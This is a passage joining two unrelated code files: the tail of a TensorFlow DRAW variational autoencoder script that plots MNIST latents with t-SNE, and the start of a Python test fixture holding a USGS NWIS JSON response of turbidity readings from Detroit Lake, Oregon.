enc_size = 500 # number of hidden units / output size in LSTM
dec_size = 500
read_n = 12 # read glimpse grid width/height
write_n = 12 # write glimpse grid width/height
read_size = 2*read_n*read_n if FLAGS.read_attn else 2*img_size
rs = np.sqrt(read_size/2).astype(int)
write_size = write_n*write_n if FLAGS.write_attn else img_size
z_size=10 # QSampler output size
T=10 # MNIST generation sequence length
batch_size=train_data._num_examples # training minibatch size
train_iters=10000
learning_rate=1e-3 # learning rate for optimizer
eps=1e-8 # epsilon for numerical stability
## BUILD MODEL ##
DO_SHARE=None # workaround for variable_scope(reuse=True)
x = tf.placeholder(tf.float32,shape=(batch_size,img_size)) # input (batch_size * img_size)
e=tf.random_normal((batch_size,z_size), mean=0, stddev=1) # Qsampler noise
lstm_enc = LSTMCell(enc_size, (rs/4)*(rs/4)*5+dec_size) # encoder Op
lstm_dec = LSTMCell(dec_size, z_size) # decoder Op
phase_train = tf.placeholder(tf.bool, name='phase_train')
def linear(x,output_dim):
"""
affine transformation Wx+b
assumes x.shape = (batch_size, num_features)
"""
w=tf.get_variable("w", [x.get_shape()[1], output_dim])
b=tf.get_variable("b", [output_dim], initializer=tf.constant_initializer(0.0))
return tf.matmul(x,w)+b
from tensorflow.python import control_flow_ops
def batch_norm(x, n_out, phase_train, conv=True, scope='bn'):
"""
Batch normalization on convolutional maps.
Args:
x: Tensor, 4D BHWD input maps
n_out: integer, depth of input maps
phase_train: boolean tf.Varialbe, true indicates training phase
scope: string, variable scope
Return:
normed: batch-normalized maps
"""
with tf.variable_scope(scope):
beta = tf.Variable(tf.constant(0.0, shape=[n_out]),
name='beta', trainable=True)
gamma = tf.Variable(tf.constant(1.0, shape=[n_out]),
name='gamma', trainable=True)
if conv:
batch_mean, batch_var = tf.nn.moments(x, [0,1,2], name='moments')
else:
batch_mean, batch_var = tf.nn.moments(x, [0], name='moments')
ema = tf.train.ExponentialMovingAverage(decay=0.5)
def mean_var_with_update():
ema_apply_op = ema.apply([batch_mean, batch_var])
with tf.control_dependencies([ema_apply_op]):
return tf.identity(batch_mean), tf.identity(batch_var)
mean, var = tf.cond(phase_train,
mean_var_with_update,
lambda: (ema.average(batch_mean), ema.average(batch_var)))
normed = tf.nn.batch_normalization(x, mean, var, beta, gamma, 1e-3)
return normed
def filterbank(gx, gy, sigma2,delta, N):
grid_i = tf.reshape(tf.cast(tf.range(N), tf.float32), [1, -1])
mu_x = gx + (grid_i - N / 2 - 0.5) * delta # eq 19
mu_y = gy + (grid_i - N / 2 - 0.5) * delta # eq 20
a = tf.reshape(tf.cast(tf.range(A), tf.float32), [1, 1, -1])
b = tf.reshape(tf.cast(tf.range(B), tf.float32), [1, 1, -1])
mu_x = tf.reshape(mu_x, [-1, N, 1])
mu_y = tf.reshape(mu_y, [-1, N, 1])
sigma2 = tf.reshape(sigma2, [-1, 1, 1])
Fx = tf.exp(-tf.square((a - mu_x) / (2*sigma2))) # 2*sigma2?
Fy = tf.exp(-tf.square((b - mu_y) / (2*sigma2))) # batch x N x B
# normalize, sum over A and B dims
Fx=Fx/tf.maximum(tf.reduce_sum(Fx,2,keep_dims=True),eps)
Fy=Fy/tf.maximum(tf.reduce_sum(Fy,2,keep_dims=True),eps)
return Fx,Fy
def attn_window(scope,h_dec,N):
with tf.variable_scope(scope,reuse=DO_SHARE):
params=linear(h_dec,5)
gx_,gy_,log_sigma2,log_delta,log_gamma=tf.split(1,5,params)
gx=(A+1)/2*(gx_+1)
gy=(B+1)/2*(gy_+1)
sigma2=tf.exp(log_sigma2)
delta=(max(A,B)-1)/(N-1)*tf.exp(log_delta) # batch x N
return filterbank(gx,gy,sigma2,delta,N)+(tf.exp(log_gamma),)
## READ ##
def read_no_attn(x,x_hat,h_dec_prev):
return tf.concat(1,[x,x_hat])
def read_attn(x,x_hat,h_dec_prev):
Fx,Fy,gamma=attn_window("read",h_dec_prev,read_n)
def filter_img(img,Fx,Fy,gamma,N):
Fxt=tf.transpose(Fx,perm=[0,2,1])
img=tf.reshape(img,[-1,B,A])
glimpse=tf.batch_matmul(Fy,tf.batch_matmul(img,Fxt))
glimpse=tf.reshape(glimpse,[-1,N*N])
return glimpse*tf.reshape(gamma,[-1,1])
x=filter_img(x,Fx,Fy,gamma,read_n) # batch x (read_n*read_n)
x_hat=filter_img(x_hat,Fx,Fy,gamma,read_n)
return tf.concat(1,[x,x_hat]) # concat along feature axis
read = read_attn if FLAGS.read_attn else read_no_attn
## ENCODE ##
def encode(state,r,h_dec):
"""
run LSTM
state = previous encoder state
input = cat(read,h_dec_prev)
returns: (output, new_state)
"""
with tf.variable_scope("encoder",reuse=DO_SHARE):
"""
def lstm_cell(i, o, state):
h = tf.get_variable("h", [batch_size, enc_size])
input_gate = tf.sigmoid(tf.matmul(i, ix) + tf.matmul(o, im) + ib)
forget_gate = tf.sigmoid(tf.matmul(i, fx) + tf.matmul(o, fm) + fb)
tf.get_variable("w", [x.get_shape()[1], output_dim])
update = tf.matmul(i, cx) + tf.matmul(o, cm) + cb
state = forget_gate * state + input_gate * tf.tanh(update)
output_gate = tf.sigmoid(tf.matmul(i, ox) + tf.matmul(o, om) + ob)
return output_gate * tf.tanh(state), state
"""
W1=tf.get_variable("W1", [3, 3, 2, 32*2])
W2=tf.get_variable("W2", [3, 3, 32*2, 64*2])
W3=tf.get_variable("W3", [3, 3, 64*2, 128*2])
W4=tf.get_variable("W4", [1, 1, 128*2, 5])
x=tf.reshape(r, [-1,rs,rs,2])
x=tf.nn.conv2d(x, W1, strides=[1, 2, 2, 1], padding='SAME')
x = tf.nn.relu(batch_norm(x, 32*2, phase_train))
x=tf.nn.conv2d(x, W2, strides=[1, 1, 1, 1], padding='SAME')
x = tf.nn.relu(batch_norm(x, 64*2, phase_train))
x=tf.nn.conv2d(x, W3, strides=[1, 2, 2, 1], padding='SAME')
x = tf.nn.relu(batch_norm(x, 128*2, phase_train))
x=tf.nn.conv2d(x, W4, strides=[1, 1, 1, 1], padding='VALID')
x = tf.nn.relu(batch_norm(x, 5, phase_train))
input=tf.reshape(x, [-1, (rs/4)*(rs/4)*5])
return lstm_enc(tf.concat(1,[input,h_dec]),state)
## Q-SAMPLER (VARIATIONAL AUTOENCODER) ##
def sampleQ(h_enc):
"""
Samples Zt ~ normrnd(mu,sigma) via reparameterization trick for normal dist
mu is (batch,z_size)
"""
with tf.variable_scope("mu",reuse=DO_SHARE):
mu=linear(h_enc,z_size)
with tf.variable_scope("sigma",reuse=DO_SHARE):
logsigma=linear(h_enc,z_size)
sigma=tf.exp(logsigma)
return (mu + sigma*e, mu, logsigma, sigma)
## DECODER ##
def decode(state,input):
with tf.variable_scope("decoder",reuse=DO_SHARE):
h_dec, state = lstm_dec(input, state)
W1=tf.get_variable("W1", [3, 3, 128*2, dec_size])
W2=tf.get_variable("W2", [3, 3, 64*2, 128*2])
W3=tf.get_variable("W3", [5, 5, 64*2, 64*2])
W4=tf.get_variable("W4", [5, 5, 32*2, 64*2])
W5=tf.get_variable("W5", [5, 5, 32*2, 32*2])
W6=tf.get_variable("W6", [5, 5, 1, 32*2])
x=tf.reshape(h_dec, [-1,1,1,dec_size])
x=tf.nn.conv2d_transpose(x, W1, [batch_size, 3, 3, 128*2], strides=[1, 1, 1, 1], padding='VALID')
x = tf.nn.relu(batch_norm(x, 128*2, phase_train))
x=tf.nn.conv2d_transpose(x, W2, [batch_size, 6, 6, 64*2], strides=[1, 2, 2, 1], padding='SAME')
x = tf.nn.relu(batch_norm(x, 64*2, phase_train))
x=tf.nn.conv2d_transpose(x, W3, [batch_size, 12, 12, 64*2], strides=[1, 2, 2, 1], padding='SAME')
x = tf.nn.relu(batch_norm(x, 64*2, phase_train))
x=tf.nn.conv2d_transpose(x, W4, [batch_size, 12, 12, 32*2], strides=[1, 1, 1, 1], padding='SAME')
x = tf.nn.relu(batch_norm(x, 32*2, phase_train))
x=tf.nn.conv2d_transpose(x, W5, [batch_size, 12, 12, 32*2], strides=[1, 1, 1, 1], padding='SAME')
x = tf.nn.relu(batch_norm(x, 32*2, phase_train))
x=tf.nn.conv2d_transpose(x, W6, [batch_size, 12, 12, 1], strides=[1, 1, 1, 1], padding='SAME')
x = tf.nn.relu(batch_norm(x, 1, phase_train))
return tf.reshape(x, [-1, 12*12]), h_dec, state
## WRITER ##
def write_no_attn(h_dec):
with tf.variable_scope("write",reuse=DO_SHARE):
return linear(h_dec,img_size)
def write_attn(h_dec):
with tf.variable_scope("writeW",reuse=DO_SHARE):
w=linear(h_dec,write_size) # batch x (write_n*write_n)
N=write_n
w=tf.reshape(w,[batch_size,N,N])
Fx,Fy,gamma=attn_window("write",h_dec,write_n)
Fyt=tf.transpose(Fy,perm=[0,2,1])
wr=tf.batch_matmul(Fyt,tf.batch_matmul(w,Fx))
wr=tf.reshape(wr,[batch_size,B*A])
#gamma=tf.tile(gamma,[1,B*A])
return wr*tf.reshape(1.0/gamma,[-1,1])
write=write_attn if FLAGS.write_attn else write_no_attn
## STATE VARIABLES ##
cs=[0]*T # sequence of canvases
z=[0]*T
mus,logsigmas,sigmas=[0]*T,[0]*T,[0]*T # gaussian params generated by SampleQ. We will need these for computing loss.
# initial states
h_dec_prev=tf.zeros((batch_size,dec_size))
enc_state=lstm_enc.zero_state(batch_size, tf.float32)
dec_state=lstm_dec.zero_state(batch_size, tf.float32)
## DRAW MODEL ##
# construct the unrolled computational graph
for t in range(T):
c_prev = tf.zeros((batch_size,img_size)) if t==0 else cs[t-1]
x_hat=x-tf.minimum(tf.nn.relu(c_prev),1) # error image
r=read(x,x_hat,h_dec_prev)
h_enc, enc_state=encode(enc_state,r,h_dec_prev)
#h_en = batch_norm(h_enc, 500, phase_train, conv=False)
z[t],mus[t],logsigmas[t],sigmas[t]=sampleQ(h_enc)
out,h_dec,dec_state=decode(dec_state,z[t])
cs[t]=c_prev+write(out) # store results
h_dec_prev=h_dec
DO_SHARE=True # from now on, share variables
## LOSS FUNCTION ##
"""
def binary_crossentropy(t,o):
return -(t*tf.log(o+eps) + (1.0-t)*tf.log(1.0-o+eps))
# reconstruction term appears to have been collapsed down to a single scalar value (rather than one per item in minibatch)
x_recons=tf.minimum(tf.nn.relu(cs[-1]),1)
# after computing binary cross entropy, sum across features then take the mean of those sums across minibatches
Lx=tf.reduce_sum(binary_crossentropy(x,x_recons),1) # reconstruction term
Lx=tf.reduce_mean(Lx)
kl_terms=[0]*T
for t in range(T):
mu2=tf.square(mus[t])
sigma2=tf.square(sigmas[t])
logsigma=logsigmas[t]
kl_terms[t]=0.5*tf.reduce_sum(mu2+sigma2-2*logsigma,1)-T*.5 # each kl term is (1xminibatch)
KL=tf.add_n(kl_terms) # this is 1xminibatch, corresponding to summing kl_terms from 1:T
Lz=tf.reduce_mean(KL) # average over minibatches
cost=Lx+Lz
## OPTIMIZER ##
optimizer=tf.train.AdamOptimizer(learning_rate, beta1=0.5)
grads=optimizer.compute_gradients(cost)
for i,(g,v) in enumerate(grads):
if g is not None:
grads[i]=(tf.clip_by_norm(g,5),v) # clip gradients
train_op=optimizer.apply_gradients(grads)
"""
## RUN TRAINING ##
# binarized (0-1) mnist data
#fetches=[]
#fetches.extend([Lx,Lz,train_op])
Lxs=[0]*train_iters
Lzs=[0]*train_iters
#gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.333)
#sess = tf.InteractiveSession(config=tf.ConfigProto(gpu_options=gpu_options))
gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.1)
sess = tf.InteractiveSession(config=tf.ConfigProto(gpu_options=gpu_options))
saver = tf.train.Saver() # saves variables learned during training
#tf.initialize_all_variables().run()
#saver.restore(sess, "drawmodel.ckpt") # to restore from model, uncomment this line
saver.restore(sess, "drawmodel.ckpt") # to restore from model, uncomment this line
xtrain=train_data._images # xtrain is (batch_size x img_size)
feed_dict={x:xtrain, phase_train.name: False}
canvases=sess.run(cs,feed_dict)
latent=sess.run(z,feed_dict) # generate some examples
latent=np.array(latent) # T x batch x img_size
latent=latent[1]
print(np.max(latent))
#latent=np.reshape(latent,(T*batch_size,z_size))
Y = tsne.tsne(latent, 2, 50, 5.0);
fig, ax = Plot.subplots()
artists = []
print(Y.shape[0])
print(xtrain.shape[0])
for i, (x0, y0) in enumerate(zip(Y[:,0], Y[:,1])):
image = xtrain[i%xtrain.shape[0]]
image = image.reshape(56,56)
im = OffsetImage(image, zoom=1.0)
ab = AnnotationBbox(im, (x0, y0), xycoords='data', frameon=False)
artists.append(ax.add_artist(ab))
ax.update_datalim(np.column_stack([Y[:,0], Y[:,1]]))
ax.autoscale()
#Plot.scatter(Y[:,0], Y[:,1], 20);
Plot.show();
sess.close()
print('Done drawing! Have a nice day! :)')
|
|
# -*- coding: utf-8 -*-
"""
fixtures_multiple_methods.py
This file contains json from NWIS requests that return multiple methods for a
single parameter. This might occur when there are two sensors of the same type
mounted at different elevations.
This fixture was set up to solve Issue #77.
multi_meth: hf.NWIS(site = '444306122144600', service = 'iv', parameterCd = '63680', start_date = '2020-04-18', end_date = '2020-04-18')
This request is for a site that collects turbidity data (param #63680) using
two different methods: 1 meter deep, and a variable profile.
"""
multi_meth = {
'name': 'ns1:timeSeriesResponseType',
'declaredType': 'org.cuahsi.waterml.TimeSeriesResponseType',
'scope': 'javax.xml.bind.JAXBElement$GlobalScope',
'value': {'queryInfo': {'queryURL': 'http://nwis.waterservices.usgs.gov/nwis/iv/format=json%2C1.1&sites=444306122144600¶meterCd=63680&startDT=2020-04-18&endDT=2020-04-18',
'criteria': {'locationParam': '[ALL:444306122144600]',
'variableParam': '[63680]',
'timeParam': {'beginDateTime': '2020-04-18T00:00:00.000',
'endDateTime': '2020-04-18T23:59:59.000'},
'parameter': []},
'note': [{'value': '[ALL:444306122144600]', 'title': 'filter:sites'},
{'value': '[mode=RANGE, modifiedSince=null] interval={INTERVAL[2020-04-18T00:00:00.000-04:00/2020-04-18T23:59:59.000Z]}',
'title': 'filter:timeRange'},
{'value': 'methodIds=[ALL]', 'title': 'filter:methodId'},
{'value': '2020-11-18T01:54:47.014Z', 'title': 'requestDT'},
{'value': '09460950-2941-11eb-9560-4cd98f8df011', 'title': 'requestId'},
{'value': 'Provisional data are subject to revision. Go to http://waterdata.usgs.gov/nwis/help/?provisional for more information.',
'title': 'disclaimer'},
{'value': 'nadww01', 'title': 'server'}]},
'timeSeries': [{'sourceInfo': {'siteName': 'DETROIT LAKE AT LOG BOOM BEHIND DETROIT DAM, OR',
'siteCode': [{'value': '444306122144600',
'network': 'NWIS',
'agencyCode': 'USGS'}],
'timeZoneInfo': {'defaultTimeZone': {'zoneOffset': '-08:00',
'zoneAbbreviation': 'PST'},
'daylightSavingsTimeZone': {'zoneOffset': '-07:00',
'zoneAbbreviation': 'PDT'},
'siteUsesDaylightSavingsTime': True},
'geoLocation': {'geogLocation': {'srs': 'EPSG:4326',
'latitude': 44.7183194,
'longitude': -122.2461389},
'localSiteXY': []},
'note': [],
'siteType': [],
'siteProperty': [{'value': 'LK', 'name': 'siteTypeCd'},
{'value': '17090005', 'name': 'hucCd'},
{'value': '41', 'name': 'stateCd'},
{'value': '41047', 'name': 'countyCd'}]},
'variable': {'variableCode': [{'value': '63680',
'network': 'NWIS',
'vocabulary': 'NWIS:UnitValues',
'variableID': 51443524,
'default': True}],
'variableName': 'Turbidity, water, unfiltered, monochrome near infra-red LED light, 780-900 nm, detection angle 90 ±2.5°, formazin nephelometric units (FNU)',
'variableDescription': 'Turbidity, water, unfiltered, monochrome near infra-red LED light, 780-900 nm, detection angle 90 +-2.5 degrees, formazin nephelometric units (FNU)',
'valueType': 'Derived Value',
'unit': {'unitCode': 'FNU'},
'options': {'option': [{'name': 'Statistic', 'optionCode': '00000'}]},
'note': [],
'noDataValue': -999999.0,
'variableProperty': [],
'oid': '51443524'},
'values': [{'value': [{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T00:26:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T00:56:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T02:26:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T02:56:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T03:26:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T03:56:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T05:26:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T05:56:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T06:26:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T06:56:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:56:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T08:26:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T08:56:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T10:56:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T12:26:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T12:56:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:56:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T14:26:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T14:56:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T15:26:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T15:56:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T16:56:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T17:26:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T17:56:00.000-07:00'},
{'value': '1.3',
'qualifiers': ['P'],
'dateTime': '2020-04-18T18:26:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T18:56:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T19:56:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T20:26:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T20:56:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T21:26:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T21:56:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T22:56:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T23:26:00.000-07:00'},
{'value': '1.3',
'qualifiers': ['P'],
'dateTime': '2020-04-18T23:56:00.000-07:00'}],
'qualifier': [{'qualifierCode': 'P',
'qualifierDescription': 'Provisional data subject to revision.',
'qualifierID': 0,
'network': 'NWIS',
'vocabulary': 'uv_rmk_cd'}],
'qualityControlLevel': [],
'method': [{'methodDescription': '[1 Meter Below The Surface]',
'methodID': 254051}],
'source': [],
'offset': [],
'sample': [],
'censorCode': []},
{'value': [{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:01:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:03:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:04:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:06:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:07:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:09:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:11:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:12:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:14:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:15:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:17:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:19:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:22:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:24:00.000-07:00'},
{'value': '1.6',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:26:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:28:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:30:00.000-07:00'},
{'value': '2.1',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:32:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:34:00.000-07:00'},
{'value': '1.6',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:36:00.000-07:00'},
{'value': '1.6',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:39:00.000-07:00'},
{'value': '1.6',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:41:00.000-07:00'},
{'value': '2.0',
'qualifiers': ['P'],
'dateTime': '2020-04-18T01:44:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:01:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:03:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:04:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:06:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:07:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:09:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:11:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:12:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:14:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:15:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:17:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:20:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:22:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:24:00.000-07:00'},
{'value': '1.6',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:26:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:28:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:30:00.000-07:00'},
{'value': '1.6',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:32:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:34:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:37:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:39:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:41:00.000-07:00'},
{'value': '1.6',
'qualifiers': ['P'],
'dateTime': '2020-04-18T04:44:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:01:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:03:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:04:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:06:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:07:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:09:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:10:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:12:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:14:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:15:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:17:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:19:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:21:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:24:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:26:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:28:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:30:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:32:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T07:35:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:01:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:03:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:04:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:06:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:07:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:09:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:10:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:12:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:14:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:15:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:17:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:19:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:21:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:23:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:25:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:27:00.000-07:00'},
{'value': '1.6',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:30:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T13:32:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T16:01:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T16:03:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T16:04:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T16:06:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T16:07:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T16:09:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T16:10:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T16:12:00.000-07:00'},
{'value': '1.9',
'qualifiers': ['P'],
'dateTime': '2020-04-18T16:14:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T16:15:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T16:17:00.000-07:00'},
{'value': '1.4',
'qualifiers': ['P'],
'dateTime': '2020-04-18T16:19:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T16:21:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T16:23:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T16:25:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T16:27:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
'dateTime': '2020-04-18T16:29:00.000-07:00'},
{'value': '1.5',
'qualifiers': ['P'],
